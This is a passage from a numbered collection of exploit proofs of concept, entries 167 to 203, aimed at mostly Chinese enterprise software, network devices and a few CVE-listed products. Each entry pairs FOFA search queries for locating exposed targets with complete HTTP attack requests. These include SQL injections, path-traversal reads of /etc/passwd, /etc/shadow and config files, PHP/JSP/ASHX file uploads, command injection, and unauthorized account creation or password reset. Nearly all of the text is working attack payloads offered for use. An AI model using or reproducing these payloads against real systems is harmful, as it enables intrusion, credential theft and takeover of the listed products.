Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"

POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone (山石网科) 云鉴 Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"

GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. FE (飞企互联) Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. Volans (飞鱼星) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"

POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan Fengsu Technology (河南省风速科技) Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. Zheda Enter (浙大恩特) Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"

GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. Aliyun Drive (阿里云盘) WebDAV command injection
CVE-2024-29640

GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system assetsmanager_upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) Omnimedia News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"

POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 (Weiqin) system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"

Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. Redsea Cloud (红海云) EHR PtFjk file upload
FOFA:body="RedseaPlatform"

POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--